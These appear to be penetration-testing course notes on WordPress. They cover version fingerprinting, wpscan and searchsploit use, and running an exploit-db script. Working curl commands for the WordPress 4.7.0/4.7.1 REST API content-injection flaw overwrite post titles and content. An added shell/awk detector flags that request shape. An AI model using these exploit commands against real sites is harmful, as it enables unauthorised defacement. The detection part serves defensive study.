WordPress

Use curl to get the WordPress version

curl -s http://www.test.com/wordpress/ | grep generator

Use wpscan to run a vulnerability scan against a WordPress site

wpscan --no-update --url http://www.test.com/wordpress/ | grep Title

Use searchsploit against the version of the WordPress site

searchsploit wordpress 4.7.1

# Review exploit
searchsploit 41224 --examine
# or
cat /opt/exploitdb/exploits/linux/webapps/41224.rb

# To run exploit (Could be python or ruby)
ruby /opt/exploitdb/exploits/linux/webapps/41224.rb

curl --data "id=4xxxxx&title=PWNED&content=Epic PWNAGE" http://www.sec542.org/wordpress/index.php/wp-json/wp/v2/posts/4

Curl exploit for WordPress 4.7.0/4.7.1 Content Injection

Change id=5 and the post ID at the end of the URL to match an ID returned by curl http://www.test.com/wordpress/wp-json/wp/v2/posts. The command below modifies a post. This can also be done via Atom: https://blog.websecurify.com/2017/02/hacking-wordpress-4-7-0-1.html

curl --data "id=5xxxxx&title=HACKED&content=THIS SITE IS EXPLOITABLE" http://www.test.com/wordpress/index.php/wp-json/wp/v2/posts/5
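
A defender-side check for the request shape shown above, as an added example that is not part of the original notes: it flags REST API post requests whose id parameter is not a plain integer (such as id=5xxxxx), whether it arrives in the query string or the body. The tab-separated method/URI/body record format, the function names and the sample records are assumptions constructed for illustration.

```shell
#!/bin/sh
# Added example (not from the original notes).
# Assumed input: one request per line as  METHOD<TAB>URI<TAB>BODY,
# e.g. exported from a WAF or audit log that records POST bodies.

# Print every request to /wp-json/wp/v2/posts/<n> that carries an
# "id" parameter (query string or body) that is not purely numeric.
flag_rest_id_tampering() {
  awk -F '\t' '
    {
      uri = $2; body = $3
      # Only single-post routes of the REST API are of interest.
      if (uri !~ /\/wp-json\/wp\/v2\/posts\/[0-9]+(\?|$)/) next

      # Collect parameters from both the query string and the body.
      query = ""
      pos = index(uri, "?")
      if (pos > 0) query = substr(uri, pos + 1)
      n = split(query "&" body, kv, "&")

      for (j = 1; j <= n; j++) {
        if (kv[j] ~ /^id=/) {
          val = substr(kv[j], 4)
          # A legitimate post id is digits only; anything else is suspect.
          if (val !~ /^[0-9]+$/) {
            print $1 " " uri " id=" val
            break
          }
        }
      }
    }'
}

# Constructed sample records (not real traffic).
sample_requests() {
  printf 'GET\t/wordpress/wp-json/wp/v2/posts\t\n'
  printf 'POST\t/wordpress/index.php/wp-json/wp/v2/posts/5\tid=5xxxxx&title=HACKED&content=x\n'
  printf 'POST\t/wordpress/wp-json/wp/v2/posts/5?id=5abc\ttitle=t\n'
  printf 'POST\t/wordpress/wp-json/wp/v2/posts/7\tid=7&title=ok\n'
}

sample_requests | flag_rest_id_tampering
```

WordPress 4.7.2 fixed this issue, so a hit against a patched site indicates probing rather than a successful modification.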
